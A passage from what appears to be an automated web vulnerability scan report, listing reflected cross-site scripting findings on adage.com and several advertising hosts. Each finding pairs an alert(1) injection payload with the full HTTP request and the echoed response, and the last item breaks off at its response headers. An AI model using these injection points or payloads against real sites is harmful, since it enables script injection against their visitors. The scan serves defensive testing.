Set-Cookie: HMAC=6C26DBBBAE6435C3100DB3321787AD8E64CDA44B; path=/
Set-Cookie: HMAC=A840CB8D94DCF4735D71175DA41056CDA0F17A63; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/jquery.onefblikev1.1.jsd6761"-alert(1)-"f29ca89fea7"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.144. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 104ac"-alert(1)-"0dceffe146a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts104ac"-alert(1)-"0dceffe146a/jquery.onefblikev1.2.js?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EBAB5867C21BE692F13F81B7DD8E4D6ABC5F76FF; path=/
Set-Cookie: HMAC=7DC03D9D66698960F451F04BB508BFB0D7FE78C1; path=/
Set-Cookie: HMAC=1745516514A169ADF8390AA108CF2827C370FC96; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts104ac"-alert(1)-"0dceffe146a/jquery.onefblikev1.2.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,
...[SNIP]...

1.145. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.2.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9063"-alert(1)-"f157f019c33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/jquery.onefblikev1.2.jsa9063"-alert(1)-"f157f019c33?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9619510D151FD5BB8A0A4F456386079CD145197C; path=/
Set-Cookie: HMAC=8090FCBE243F2832B160BF74B1ED96CDAE1E6150; path=/
Set-Cookie: HMAC=F0A1DD38620FD18090FDC1ABA791E0EFE74668FC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/jquery.onefblikev1.2.jsa9063"-alert(1)-"f157f019c33"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.146. http://adage.com/scripts/lib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/lib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee42c"-alert(1)-"efc55fb88e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scriptsee42c"-alert(1)-"efc55fb88e2/lib.js?1291744536 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=FC83D1EA153ADB7ECA957E976F080E54A3BDE903; path=/
Set-Cookie: HMAC=507A20C562A54C34DBEAAA492A97EAA8ECFCC6A6; path=/
Set-Cookie: HMAC=DBCDEF6C250F50F2C43BD956DDFB0AA1FB476DBB; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49450
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744536";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scriptsee42c"-alert(1)-"efc55fb88e2/lib.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y"
...[SNIP]...

1.147. http://adage.com/scripts/lib.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/lib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da2e1"-alert(1)-"09160422661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/lib.jsda2e1"-alert(1)-"09160422661?1291744536 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EBCDBB89CCF1C4E8DE3FE6DD5CA44E218F439245; path=/
Set-Cookie: HMAC=B4B6F28F9D90E176C0CBC73DF6354ADEA0C0F333; path=/
Set-Cookie: HMAC=55FF4EACA1D7CBCFD1F90228024C9CDB6FD54993; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49450
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744536";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/lib.jsda2e1"-alert(1)-"09160422661"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.148. http://adage.com/scripts/sniff.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/sniff.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 608bd"-alert(1)-"f66b54a0fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts608bd"-alert(1)-"f66b54a0fd5/sniff.js?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=85C478972A06CF51F23508EBF3B28E90EFFC2D77; path=/
Set-Cookie: HMAC=39E60074C0C67D2C160347C4C9DB49769CEF9A38; path=/
Set-Cookie: HMAC=031ECE6E620E860A401A3E581AA7130970EA59C1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49452
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts608bd"-alert(1)-"f66b54a0fd5/sniff.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="
...[SNIP]...

1.149. http://adage.com/scripts/sniff.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/sniff.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81763"-alert(1)-"1b4c8ebcd37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/sniff.js81763"-alert(1)-"1b4c8ebcd37?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=393173EFE5216979CBF8F08A2C92BBCBDC9BF757; path=/
Set-Cookie: HMAC=0154871FD70557B70A53061157F3F7921FAC3DF3; path=/
Set-Cookie: HMAC=2F8D789D484798D8ABCC858E5B7E7C1DD17AA331; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49452
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/sniff.js81763"-alert(1)-"1b4c8ebcd37"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.150. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c66c'%3balert(1)//7a5ab1f91b4 was submitted in the admeld_adprovider_id parameter. This input was echoed as 2c66c';alert(1)//7a5ab1f91b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=782c66c'%3balert(1)//7a5ab1f91b4&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:49:32 GMT
X-Name: rtb-s10
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=782c66c';alert(1)//7a5ab1f91b4&external_user_id=0&expiration=1313362172" alt="" />');

1.151. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 456c5'%3balert(1)//640b1256e6d was submitted in the admeld_callback parameter. This input was echoed as 456c5';alert(1)//640b1256e6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match456c5'%3balert(1)//640b1256e6d HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:49:28 GMT
X-Name: rtb-s07
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match456c5';alert(1)//640b1256e6d?admeld_adprovider_id=78&external_user_id=0&expiration=1313362168" alt="" />');

1.152. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdde'-alert(1)-'de9a7a700f7 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=193ffdde'-alert(1)-'de9a7a700f7&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/news_atf?t=1313102492008&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIv48BEAoYAiACKAIw9rOR8gQQ9rOR8gQYAQ..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRox[ex7O-wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*JxnV2i6j; sess=1; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:43:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:43:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 11 Aug 2011 22:43:29 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ffdde'-alert(1)-'de9a7a700f7&external_user_id=3539656946931560696&expiration=0" width="0" height="0"/>');

1.153. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0848'-alert(1)-'85376933358 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc0848'-alert(1)-'85376933358 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/news_atf?t=1313102492008&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIv48BEAoYAiACKAIw9rOR8gQQ9rOR8gQYAQ..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRox[ex7O-wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*JxnV2i6j; sess=1; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:43:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:43:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 11 Aug 2011 22:43:49 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchc0848'-alert(1)-'85376933358?admeld_adprovider_id=193&external_user_id=3539656946931560696&expiration=0" width="0" height="0"/>');

1.154. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1428a'%3balert(1)//b1769215d63 was submitted in the admeld_adprovider_id parameter. This input was echoed as 1428a';alert(1)//b1769215d63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=731428a'%3balert(1)//b1769215d63&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102149616&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=36OwoKhw1oP

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Thu, 11 Aug 2011 22:35:14 GMT
Expires: Thu, 11 Aug 2011 22:35:14 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=36OwoKhw1oP; Domain=.lucidmedia.com; Expires=Fri, 10-Aug-2012 22:35:14 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

